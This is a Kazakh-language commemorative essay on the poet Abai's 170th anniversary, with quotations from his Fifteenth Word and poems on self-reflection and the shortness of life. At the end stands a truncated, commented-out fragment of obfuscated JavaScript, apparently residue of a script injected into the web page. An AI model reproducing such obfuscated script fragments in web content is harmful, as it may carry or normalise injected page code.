Асыл сөзді іздесең, Абайды оқы, ерінбе! (Қосымша тапсырма)

  Ұлы Абай ақынды білмейтін халық, танымайтын қазақ жоқ шығар, сірә, бұл күнде.  Ақындық пен сазгерліккке бет бұрған Абай ақынның әндері мен өлеңдері жұртшылық жүрегінен ойып тұрып орын алады. Сырлы сазды ойлы түйін түйген ойшыл ақын ән құдіреті өнердің қасиеті туралы талай тамаша өлеңдер жазды. Осындай қазақтың дара тұлғасының туғанына 170 жыл толыпты. Абай үні – жүрек үні. Абай сөзі – жүрек сөзі. Ақын шығармаларын оқығанда оның жүрек соғысын кез – келген көзі ашық, көкірегі ояу адам баласы сезе алады. Абай – бар болмысымен, шын жүрегімен жырлап өткен ақынның бірі. Сондықтан да болар оның әр өлеңі жүрегімен жазылған, өлеңі мен әндері мәңгі жасап келеді. Өзі өлсе де, өлеңдері халық жүрегінен еш өшкен емес.

     Абай сөздерінің әр сөзіне үңіліп қараған жан, оның әр сөзінен үлкен ғибрат, өнеге, ұлы сабақ алары хақ. Абай уағызын ұққан адамның қоғамның қадірлі азаматы болары даусыз. Абай өзінің саналы ғұмырында ылғи да адамгершілік, халық, адамшылыққа тәрбиелеу адам құқының басты мақсаты екенін аңғартты. Әрқайсымызға Абайды тану – мұрат, ол шыққан шыңға шығу – парыз.

   «....Егер есті кісінің қатарында болғың келсе, күнінде бір мәрте, жұмасында бір мәрте, ең болмаса айында бір өзіңнен-өзің есеп ал. Сол алдыңғы есеп алғаннан бергі өміріңді қалай өткіздің екен, не дүниеге жарамды күніңді өзің өкінбестей қылықпен өткізіппісің?

    Жоқ, болмаса не қылып өткізгеніңді өзің де білмей қалыппысың?»

  (Он бесінші қарасөзі)

Бұл сөзінде Абай адамгершілік мәселесін мінез белгілеріне байланыстыра отырып әрбір жақсы адам болам деген кісіге өз-өзіне есеп беру, өз ісіне талдау жасау керек екенін айтады.

«Сағаттың шықылдағы емес ермек,

Һәммиша өмір өтпек – ол білдірмек.

Бір минут бір кісінің өміріне ұқсас,

  Өтті, өлді, тағдыр жоқ қайта келмек»

- деп, өзі жырлағандай саналы адам қамшының қысқа сабындай өмірін

адамдықтың ақ жолынан айнымай өткізсе дейді ұлы ойшыл.

«Жүрегімнің түбіне терең бойла,

Мен бір жұмбақ адаммын оны да ойла

Соқтықпалы, соқпақсыз жерде өстім,

Мыңмен жалғыз алыстым, кінә қойма!»

-деп, ақын өз жүрегінің қатпар – қатпар құпия сырларына өзгені бойлатқысы келеді. Қиянатшыл дүниеден қырық жамау болған жүрегінің түбіне терең бойлағанды қалайды. Абай өзі өмір сүрген ғасыр үшін жұмбақ болды. Кер заманның кердең мырзалары асылдың тұнығынан қанып ішпек түгілі сол асылды жасытып жүнжітпек болды. Біз Абайды қазір жұмбақ жан ретінде емес, қазақ әдебиетінің шамшырағы ретінде қабылдаймыз.

 Абайсыз қазақты, қазақсыз Абайды көз алдымызға елестетудің өзі қиын, өйткені ол жалпақ жұртты жақсылыққа үйретіп, жамандықтан жиренткен қазақ халқының кемеңгер ақын – шешені, кең толғар дана көсемі. Оның шалқар дария шабытынан туған таңғажайып шығармалары  - жан азығының кәусар бұлағы, сөнбес шырағы. Уақыт өтсе де ақынның терең мәнді туындылары бағдар тұтар темірқазығымыздай тың биіктерге шақырады да тұрады.

 Өлмейтұғын артына сөз қалдырған ойшыл данышпан ақынның жүрегін тербеген тамаша әндер өзінің қалың елі – қазағымен бірге жасап келе жатыр. Абайдың өнер мектебінен тараған әсем әндері қазақ сахарасында қалықтап, ұрпақтан – ұрпаққа жетті. Еркін елдің өрен өнерпаздары бүгінде Абай әндерін шетелдерде де орындап, үлкен сүйіспеншілікпен асқақтата шырқайды.

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e



Бөлісу: